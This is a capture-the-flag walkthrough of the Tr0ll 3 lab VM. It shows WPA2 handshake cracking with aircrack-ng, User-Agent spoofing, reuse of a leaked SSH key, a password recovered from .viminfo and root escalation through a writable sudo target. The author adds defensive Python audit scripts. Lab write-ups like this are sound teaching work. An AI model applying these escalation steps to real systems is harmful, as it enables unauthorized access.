Tr0ll 3 – Please don’t feed the Troll (Walkthrough)

The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. Our goal is to move through different levels of users and finally gain root privileges to read the flag from /root/flag.txt. The following writeup is the summary of my solution to achieve this goal.
Level 0: start
The login information for the first user, start, with the password here, is displayed on the start screen after the virtual machine boots up.

An initial port scan using nmap also shows that currently only SSH is available, on port 22. However, this at least allows us to work on the machine from our own host.
basto@Malice:~$ ssh start@192.168.56.101
start@192.168.56.101's password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
start@Tr0ll3:~$
In the home directory of the user start we find the two folders bluepill and redpill.
start@Tr0ll3:~$ ls -al *
bluepill:
total 12
drwxrwxr-x 2 start start 4096 Jun 18 2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start 18 Jun 17 2015 awesome_work
redpill:
total 12
drwxrwxr-x 2 start start 4096 Jun 17 2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start 17 Jun 17 2015 this_will_surely_work
The file awesome_work contains nothing but the URL http://bfy.tw/ODa. If we visit the link, we are forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it is pretty obvious that this clue is a dead end and was placed there as a joke.
basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>%
As the story progresses, we are presented with similar information again and again, just to serve as a distraction. The machine lives up to its name and “trolls” us wherever it is possible.
The file this_will_surely_work in the redpill directory contains the string step2:Password1!. Our instinct tells us that these have to be the next credentials, but if we try to log in with them, we only receive an error message. Yet again, this is only a decoy.
First Clues
With the command find / -type f -perm 0777 2>/dev/null we can list files whose mode is exactly 0777, i.e. files that every user can read, write and execute regardless of their owner. This allows us to identify the first actual clues:
start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null
/var/log/.dist-manage/wytshadow.cap
/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt
On the one hand, we can read the file wytshadow.cap in the directory /var/log/.dist-manage/. This appears to be a capture of network traffic that includes a WPA2 handshake.
start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
...
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown)
23:40:52.743986 Authentication (Open System)-2:
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown)
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown)
23:40:52.759857 EAPOL key (3) v2, len 151
The password of the user wytshadow can probably be recovered if we succeed in cracking the handshake.
The file gold_star.txt in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/, on the other hand, contains numerous 10-character strings and serves as our dictionary in the attempt to recover the password.
aircrack-ng -w gold_star.txt wytshadow.cap

aircrack-ng spits out the correct password gaUoCe34t1 within a couple of minutes, and with the new credentials we can now log in as the user wytshadow:
start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1
wytshadow@Tr0ll3:~$
Level 1: wytshadow
If we look through the home directory of wytshadow, the file oohfun immediately catches our attention. This file has the SUID bit set, which allows us to run the program with the permissions of its owner, the user genphlux.
wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------ 5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 wytshadow wytshadow 297 Aug 22 09:21 .bash_history
-rw-r--r-- 1 wytshadow wytshadow 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 wytshadow wytshadow 3637 Jun 17 2015 .bashrc
drwx------ 2 wytshadow wytshadow 4096 Jun 17 2015 .cache
drwx------ 3 wytshadow wytshadow 4096 Aug 1 01:50 .gnupg
drwxrwxr-x 3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
-rw-r--r-- 1 wytshadow wytshadow 675 Jun 17 2015 .profile
However, when we actually run oohfun, we just keep getting the output iM Cr@zY L1k3 AAA LYNX:
wytshadow@Tr0ll3:~$ ./oohfun
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX
...
If we examine the file content using strings, we can see that it contains the following line:
/lol/bin/run.sh -b 0.0.0.0
Unfortunately, we cannot modify run.sh, because the parent directory lol is also owned by the user genphlux.
wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x 8 genphlux root 4096 May 22 2009 lol
In Linux, all commands that we may execute with root privileges via sudo can be listed with the command sudo -l:
wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wytshadow may run the following commands on Tr0ll3:
(root) /usr/sbin/service nginx start
We can see that the user wytshadow is allowed to start the nginx web server service, which is what we do next:
wytshadow@Tr0ll3:~$ sudo service nginx start
A local check of the open ports using netstat confirms that the web server has started. We can now see the new service on port 8080.
wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
However, we cannot use the web service, since all requests are rejected with a 403 Forbidden error message.
basto@Malice:~$ curl 192.168.56.101:8080
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
To narrow down the problem, we open the file /etc/nginx/sites-ed/default and take a look at the default configuration of the nginx web server. At the very beginning we notice the following block:
# Default server configuration
#
server {
listen 8080 default_server;
listen [::]:8080 default_server;
if ($http_user_agent !~ "Lynx*"){
return 403;
}
If a request's User-Agent header does not match Lynx, the server always responds with a 403 error. Since the file is unfortunately read-only, we cannot change the configuration. However, using curl we can set our own User-Agent header in the expected format.
basto@Malice:~$ curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
genphlux:HF9nd0cR!
We can now use the credentials received in the response to log in as the user genphlux.
wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!
genphlux@Tr0ll3:~$
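Two things are worth noting about the nginx rule from the default site configuration above, and the following Python snippet, an added example of mine rather than anything from the VM or its author, makes them concrete. First, nginx's ~ operator is an unanchored, case-sensitive PCRE search, so "Lynx*" matches any header that merely contains "Lyn" (the trailing x* is optional), not only user agents that begin with Lynx. Second, and more important for a defender, the User-Agent header is chosen by the client, so no regex on it restricts who can reach a page. The pattern ^Lynx is my assumption about what the rule's author intended.

```python
import re

# Reproduction of the user-agent rule from the VM's nginx site config:
#   if ($http_user_agent !~ "Lynx*") { return 403; }
# nginx's "~" performs a case-sensitive, unanchored PCRE search, so "Lynx*"
# means the literal "Lyn" followed by zero or more "x", anywhere in the header.
RULE_AS_WRITTEN = re.compile(r"Lynx*")
# Assumed intent of the rule's author: the header must begin with "Lynx".
RULE_ANCHORED = re.compile(r"^Lynx")


def nginx_decision(rule, user_agent):
    """Return the HTTP status nginx would produce for this header under `rule`.

    `!~` negates the match: a header that does NOT match triggers `return 403`;
    any matching header falls through to normal request handling (200 here).
    """
    return 200 if rule.search(user_agent) else 403


def compare_rules(user_agents):
    """Map each header value to (status under the rule as written, status under ^Lynx)."""
    return {
        ua: (nginx_decision(RULE_AS_WRITTEN, ua), nginx_decision(RULE_ANCHORED, ua))
        for ua in user_agents
    }


# Constructed sample headers: what a real Lynx sends, a partial match, and two
# clients that merely embed the word somewhere in the string.
SAMPLE_USER_AGENTS = [
    "Lynx/2.8.9rel.1 libwww-FM/2.14",
    "Lyn",
    "curl/7.68.0",
    "Mozilla/5.0 (compatible; Lynx Basto)",
]

if __name__ == "__main__":
    for ua, (as_written, anchored) in compare_rules(SAMPLE_USER_AGENTS).items():
        print(f"{ua!r:45} as written: {as_written}  anchored: {anchored}")
```

Whichever form of the regex is used, the check only inconveniences clients that do not set the header. Restricting access in nginx belongs in allow/deny directives (by source address) or in auth_basic, not in a match on a client-supplied header.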
Level 2: genphlux
As always, we first take a look at the home directory of the new user.
genphlux@Tr0ll3:~$ ls -al
total 52
drwx------ 5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 genphlux genphlux 273 Aug 22 10:09 .bash_history
-rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc
drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache
drwx------ 3 genphlux genphlux 4096 Aug 1 04:03 .gnupg
drwxrwxr-x 3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus
-rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile
-rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo
-rw-rw-r-- 1 genphlux genphlux 931 Aug 2 15:56 xlogin
The file xlogin is just an HTML page with the directory listing of the web directory /xlogin, which does not help us in any way.
xlogin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /xlogin</title>
</head>
<body>
<h1>Index of /xlogin</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27 </td><td align="right">1.6K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
The file maleus, on the contrary, is much more interesting. It appears to contain an RSA private key, most likely for connecting via SSH.
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
Now we try to log in as the user maleus with the private key. However, ssh refuses to use a key file whose permissions are too open. As a result, we first have to restrict the file's permissions.
genphlux@Tr0ll3:~$ chmod 600 maleus
genphlux@Tr0ll3:~$ ssh -i maleus maleus@192.168.56.101
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
maleus@Tr0ll3:~$
Level 3.1: maleus (private key)
Since we do not yet know the actual password, we are currently unable to list the commands we may run as root using sudo -l. However, there are already several files in the home directory that deserve our attention.
maleus@Tr0ll3:~$ ls -al
total 80
drwx------ 6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
-rw------- 1 maleus maleus 42 Dec 19 07:05 .bash_history
-rw-r--r-- 1 maleus maleus 220 Jun 17 2015 .bash_logout
-rw-r--r-- 1 maleus maleus 3637 Jun 17 2015 .bashrc
drwx------ 2 maleus maleus 4096 Jun 17 2015 .cache
-rwxrwxr-x 1 maleus maleus 37 Aug 22 10:04 dont_even_bother
drwx------ 3 maleus maleus 4096 Aug 1 03:48 .gnupg
-rw-rw-r-- 1 maleus maleus 145 Jun 18 2015 index.html
drwxrwxr-x 3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r-- 1 maleus maleus 675 Jun 17 2015 .profile
drwx------ 2 maleus maleus 4096 Jun 18 2015 .ssh
-rw------- 1 maleus maleus 1301 Aug 2 16:02 .viminfo
-rw-rw-r-- 1 maleus maleus 931 Aug 22 09:55 xlogin
If we look at the source code of index.html, it seems that the next clue is immediately revealed.
index.html
<html>
<body>
<img src="pic.jpg">
</body>
</html>
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >
Unfortunately, it is not possible to log in as the user fido with the given password. It seems as if the troll has yet again played with our emotions.
Likewise, we are misled by the file dont_even_bother. If we run it, we are prompted to enter a password.
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password :
Wrong Password
A quick look at the strings contained in the file reveals the required value:
maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password :
xl8Fpx%6
maleus@Tr0ll3:~$ ./dont_even_bother
Enter the password : xl8Fpx%6
Correct Password
Your reward is just knowing you did it! :-P
So it looks like we still haven’t gotten anywhere with this user.
The file .viminfo stores Vim's saved state, such as the history of commands typed in the editor and the contents of its registers. Among other things, this file contains the following excerpt, which appears to include a user password that was edited in Vim:
.viminfo
# Registers:
""1 LINE 0
passwd
"2 LINE 0
B^slc8I$
"3 LINE 0
passswd
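Vim writes the contents of its registers into .viminfo, so a line yanked or deleted while editing a password survives in the home directory long after the edit. The following Python scanner is an added example (mine, not part of the original post or the VM): it parses the Registers section of a .viminfo file and flags register contents that look like credentials, either because the token is drawn from several character classes or because a neighbouring register mentions a password. The sample file is constructed to mirror the excerpt above.

```python
import re
import string

# A register header line looks like   "2<TAB>LINE<TAB>0
# (the unnamed register is written as ""1, pointing at register 1).
# The register's contents follow on the next line(s), indented with a tab.
REGISTER_HEADER = re.compile(r'^"(?P<name>"?\S+)\s+(?P<kind>LINE|CHAR|BLOCK)\s+\d+\s*$')
SECTION_HEADER = re.compile(r"^# ")
PASSWORD_HINT = re.compile(r"pass(wd|word)|secret|token", re.IGNORECASE)


def parse_registers(viminfo_text):
    """Return the registers saved in the '# Registers:' section as (name, text) tuples."""
    registers, in_section, name, lines = [], False, None, []
    for raw in viminfo_text.splitlines():
        if SECTION_HEADER.match(raw):               # any "# ..." line starts a new section
            if name is not None:
                registers.append((name, "\n".join(lines)))
                name, lines = None, []
            in_section = raw.startswith("# Registers")
            continue
        if not in_section:
            continue
        m = REGISTER_HEADER.match(raw)
        if m:
            if name is not None:
                registers.append((name, "\n".join(lines)))
            name, lines = m.group("name"), []
        elif name is not None and raw.strip():      # content line (tab-indented in real files)
            lines.append(raw.strip())
    if name is not None:
        registers.append((name, "\n".join(lines)))
    return registers


def looks_like_secret(text):
    """Heuristic: one token of 6-64 characters drawn from at least three character classes."""
    if not (6 <= len(text) <= 64) or any(c.isspace() for c in text):
        return False
    classes = [
        any(c.islower() for c in text),
        any(c.isupper() for c in text),
        any(c.isdigit() for c in text),
        any(c in string.punctuation for c in text),
    ]
    return sum(classes) >= 3


def find_candidate_secrets(viminfo_text):
    """Flag registers that look like credentials, with the reason they were flagged."""
    findings = []
    regs = parse_registers(viminfo_text)
    for i, (name, text) in enumerate(regs):
        reasons = []
        if looks_like_secret(text):
            reasons.append("high-complexity token")
        neighbours = [t for _, t in regs[max(0, i - 1):i] + regs[i + 1:i + 2]]
        if any(PASSWORD_HINT.search(t) for t in neighbours):
            reasons.append("adjacent register mentions a password")
        if reasons:
            findings.append((name, text, "; ".join(reasons)))
    return findings


# Constructed sample modelled on the excerpt in the walkthrough (tabs as Vim writes them).
SAMPLE_VIMINFO = (
    "# This viminfo file was generated by Vim 8.0.\n"
    "\n"
    "# Command Line History (newest to oldest):\n"
    ":wq\n"
    "\n"
    "# Registers:\n"
    '""1\tLINE\t0\n'
    "\tpasswd\n"
    '"2\tLINE\t0\n'
    "\tB^slc8I$\n"
    '"3\tLINE\t0\n'
    "\tpassswd\n"
    "\n"
    "# File marks:\n"
    "'0  1  0  ~/notes.txt\n"
)

if __name__ == "__main__":
    for name, text, why in find_candidate_secrets(SAMPLE_VIMINFO):
        print(f'register "{name}: {text!r}  ({why})')
```

Running the scanner over every ~/.viminfo on a host (or pointing it at a user's file during an incident review) surfaces exactly the kind of leak exploited in this level; the fix is to clear the registers and rotate the credential, and to keep password changes out of editors in the first place.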
Level 3.2: maleus (password)
If we now execute the command sudo -l with the newly found password, we get our next hint.
maleus@Tr0ll3:~$ sudo -l
[sudo] password for maleus:
Matching Defaults entries for maleus on Tr0ll3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User maleus may run the following commands on Tr0ll3:
(root) /home/maleus/dont_even_bother
As we can see, the user maleus may execute the file /home/maleus/dont_even_bother with the permissions of the root user.
We cannot do much with the current version of the file, but our user is permitted to modify it. So we overwrite dont_even_bother with a command that starts a new shell.
maleus@Tr0ll3:~$ echo "bash" > dont_even_bother
Next we execute the overwritten file with sudo permissions.
maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)
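The misconfigurations this walkthrough relies on (the 0777 files found with find in the First Clues section, the setuid oohfun whose mode bits also make it writable by everyone, and a sudo rule whose target the invoking user may edit) are all visible from permission bits alone. The following Python script is an added example written for this walkthrough, not code from the VM or its author: it walks a directory for such files, parses the rules printed by sudo -l, and checks each target and its ancestor directories for writability by the invoking user, honouring the sticky bit the way the kernel does. The scratch directory it builds is a constructed sample; the file names dont_even_bother and oohfun are reused only as names.

```python
import os
import re
import stat
import sys
import tempfile

# sudo -l prints one rule per line:  "(runas) [NOPASSWD:] /path/to/command [args]"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:\S+:\s*)*(?P<path>/\S+)")


def parse_sudo_l(output):
    """Extract (run-as user, command path) pairs from the text printed by `sudo -l`."""
    return [(m.group("runas"), m.group("path"))
            for m in map(SUDO_RULE.match, output.splitlines()) if m]


def can_write(path, uid, gids):
    """Would a user with this uid and these gids be allowed to write `path`?

    Evaluates the mode bits as the kernel does for an unprivileged user: the owner
    class applies if the uid matches, else the group class, else "other".
    """
    st = os.lstat(path)
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_sudo_target(path, uid, gids):
    """Findings for a sudo rule whose target is `path`, from the invoking user's view.

    A writable target lets the user put any command into the file sudo will run as
    root; a writable ancestor directory lets the user rename or replace the target
    instead, unless the directory is sticky and the user owns neither it nor the entry.
    """
    findings = []
    path = os.path.abspath(path)
    if can_write(path, uid, gids):
        findings.append(f"{path}: target is writable by uid {uid}")
    child, parent = path, os.path.dirname(path)
    while child != parent:
        if can_write(parent, uid, gids):
            pst, cst = os.lstat(parent), os.lstat(child)
            sticky_blocks = bool(pst.st_mode & stat.S_ISVTX) and uid not in (pst.st_uid, cst.st_uid)
            if not sticky_blocks:
                findings.append(f"{parent}: ancestor directory is writable by uid {uid}; "
                                f"{os.path.basename(child)} can be replaced")
        child, parent = parent, os.path.dirname(parent)
    return findings


def find_risky_files(root):
    """Walk `root` for world-writable files and setuid/setgid files that group or others may write."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):       # skip symlinks, sockets, etc.
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append((full, "world-writable"))
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID) and st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((full, f"setuid/setgid (owner uid {st.st_uid}) and writable by group or others"))
    return findings


def current_identity():
    """(uid, set of gids) of the process running this audit."""
    return os.getuid(), set(os.getgroups()) | {os.getgid()}


def build_demo_tree():
    """Constructed sample: a scratch directory imitating the home directories on the VM."""
    base = tempfile.mkdtemp(prefix="tr0ll3-audit-")
    target = os.path.join(base, "dont_even_bother")   # sudo target, writable by its owner
    suid = os.path.join(base, "oohfun")               # setuid and world-writable
    clean = os.path.join(base, "ok")                  # ordinary file, nothing to report
    for p, mode in ((target, 0o664), (suid, 0o4777), (clean, 0o644)):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
        os.chmod(p, mode)
    return base, target


if __name__ == "__main__":
    # Usage: sudo -l | python3 sudo_audit.py [directory]   (defaults to the constructed sample)
    uid, gids = current_identity()
    base, target = build_demo_tree()
    root = sys.argv[1] if len(sys.argv) > 1 else base
    rules = parse_sudo_l(sys.stdin.read()) if not sys.stdin.isatty() else [("root", target)]
    for path, why in find_risky_files(root):
        print(f"{why}: {path}")
    for runas, cmd in rules:
        for finding in audit_sudo_target(cmd, uid, gids):
            print(f"sudo as {runas}: {finding}")
```

The sudo rule in this level would be reported as "target is writable" for the owner, which is the one condition a sudoers entry for a user-owned script must never have; a target that is root-owned and sits below root-owned, non-writable directories produces no findings.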
Level 4: root
As the final step we can now use our root privileges to read the contents of the flag:
root@Tr0ll3:~# cat /root/flag.txt
You are truly a Jedi!
Twitter Proof:
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
@Maleus21

